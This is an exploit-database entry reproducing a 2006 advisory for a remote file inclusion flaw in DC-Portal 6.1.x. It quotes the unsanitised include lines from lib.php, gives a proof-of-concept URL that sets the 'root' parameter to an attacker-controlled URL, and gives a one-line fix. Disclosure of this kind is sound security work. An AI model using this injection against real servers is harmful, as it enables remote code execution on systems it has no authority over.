DC-Portal 6.1.x, Remote command execution

vendor:

DC-Portal

by:

Federico Fazzi

7,5

CVSS

HIGH

Remote command execution

N/A

CWE

Product Name: DC-Portal

Affected Version From: 6.1.x

Affected Version To: 6.1.x

Patch Exists: Unavailable

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

DC-Portal 6.1.x, Remote command execution

Error occured in lib.php, line 4/7: include ("$root/library/lib_nav.php"); include ("$root/library/lib_mods.php"); include ("$root/library/lib_admin.php"); include ("$root/library/lib_3rd.php"); variable $root not sanitized (declare). Proof of concept: http://example/[dp_path]/library/lib.php?root=[cmd_url]

Mitigation:

Declare $root variable on this file.

Source

Exploit-DB raw data:

-----------------------------------------------------
Advisory id: FSA:013

Author:    Federico Fazzi
Date:      12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type:      high
Product:   http://www.dcp-portal.org/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in lib.php, line 4/7:

include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");

variable $root not sanitized (declare).

2) Proof of concept:

http://example/[dp_path]/library/lib.php?root=[cmd_url]

3) Solution:

declare $root variable on this file.

# milw0rm.com [2006-06-12]